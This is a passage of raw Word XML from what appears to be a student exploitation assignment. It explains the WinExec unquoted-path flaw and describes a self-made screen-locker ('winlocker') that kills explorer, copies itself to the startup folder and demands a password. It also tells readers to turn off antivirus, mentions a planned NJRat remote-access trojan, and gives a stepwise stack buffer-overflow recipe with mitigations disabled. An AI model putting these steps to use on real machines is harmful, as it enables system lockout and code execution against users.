    <w:p w14:paraId="1943E784" w14:textId="77777777" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="00FD1D85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D156980" w14:textId="77777777" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="004B7F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The only issue is that the executable name is treated as the first white space-delimited string in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lpCmdLine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. If the executable or path name has a space in it, there is a risk that a different executable could be run because of the way the function parses spaces. The following example is dangerous because the function will attempt to run "Program.exe", if it exists, instead of "MyApp.exe". </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739A24C1" w14:textId="6A822815" w:rsidR="00FD1D85" w:rsidRDefault="004B7F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If a malicious user were to create an application called "Program.exe" on a system, any program that incorrectly calls </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the Program Files directory will run this application instead of the intended application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668C27F3" w14:textId="77777777" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="004B7F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>===TASK_THREE_END===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E57915" w14:textId="77777777" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="00FD1D85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6362F25E" w14:textId="77777777" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="004B7F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>===TASK_FOUR_START===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F8F4E2" w14:textId="77777777" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="00FD1D85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AD78228" w14:textId="77777777" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="00FD1D85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58A8FC44" w14:textId="77777777" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="004B7F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WARNING, TURN OFF YOUR ANTIVIRUS, OR ELSE THE ANNOYING WINDOWS PROTECTION WILL JUST ERASE WLCK.EXE!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E29E55" w14:textId="77777777" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="00FD1D85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41E116B8" w14:textId="77777777" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="004B7F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The exploit launches wlck.exe which is a self-made </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>winlocker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The source file is provided as well. </w:t>
      </w:r>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>The documentation regarding the wlck.exe is not presented, but it consists of several phases:</w:t>
      </w:r>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>1. Stopping explorer.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733163A3" w14:textId="77777777" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="004B7F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2. Closing all running apps, except for itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C85967" w14:textId="77777777" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="004B7F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3. Injecting the copy of the executable into startup folder. (I actually thought to inject there something else)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491AA18E" w14:textId="77777777" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="004B7F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4. A window pops up with the message about windows block.</w:t>
      </w:r>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>5. Entering password.</w:t>
      </w:r>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>6. Restarting the PC.</w:t>
      </w:r>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">To restore everything in emergency -&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ctrl+shift+esc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, create new process and enter explorer and close the virus.</w:t>
      </w:r>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">I actually had an idea to inject a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NJRat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> file, but something went wrong and I decided to stop on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>winlocker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB495F6" w14:textId="77777777" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="004B7F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Regarding the guide to perform the buffer attack. After researching and compiling all information into one file, the guide would look like this:</w:t>
      </w:r>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>IF THE APP IS YOURS THEN FIRST DO THIS:</w:t>
      </w:r>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>compile it using a flag /GS- this will turn off buffer security, and after compiling, link it against the /DYNAMICBASE:NO and /NXCOMPAT:NO flags. Those will turn off random base address creation and turn off data execution prevention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E9BBE2" w14:textId="77777777" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="004B7F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Do not forget to use old terminal!</w:t>
      </w:r>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>1. Define the size of the buffer allocated by the executable for inputting a string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D9ABD0" w14:textId="77777777" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="00FD1D85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41A114D1" w14:textId="77777777" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="004B7F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2. At the moment when an app requests your input, check the location of ESP and EBP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA86FFD" w14:textId="77777777" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="004B7F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DD237C" w14:textId="77777777" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="004B7F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Calculate the distance between ESP+4 and EBP -&gt; DISTANCE = cast&lt;int&gt;((ESP+4) - EBP), where each stack frame consists of a hex value </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lenght</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of 8 (divide by 2 and you get 4 characters in each stack frame). The larger is buffer, the longer your and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>simplier</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> it would be to enter an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A73F70" w14:textId="77777777" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="00FD1D85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10397B0A" w14:textId="77777777" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="004B7F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">4. You fill anything of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lenght</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of DISTANCE + 4. The rest 4 characters are for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>readressing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a return address. That return address should point to the beginning of your exploit (ESP+4). </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> when function completes its work, the next instruction to be executed will be your exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0831EFD3" w14:textId="77777777" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="004B7F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECA262C" w14:textId="77777777" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="004B7F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">5. There might be a problem with esp. When reaching RETN and executing each line of you exploit, the ESP register will move downwards and re-writing assembly code. That might break your </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploit,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> therefore it would be </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>prefferable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to move ESP somewhere far away, or place it at lower addresses than the address of your exploit start. </w:t>
      </w:r>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2772DA" w14:textId="77777777" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="004B7F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Draw a stack frame of your exploit and debug it so it could execute without any problems. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006DDB42" w14:textId="77777777" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="00FD1D85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
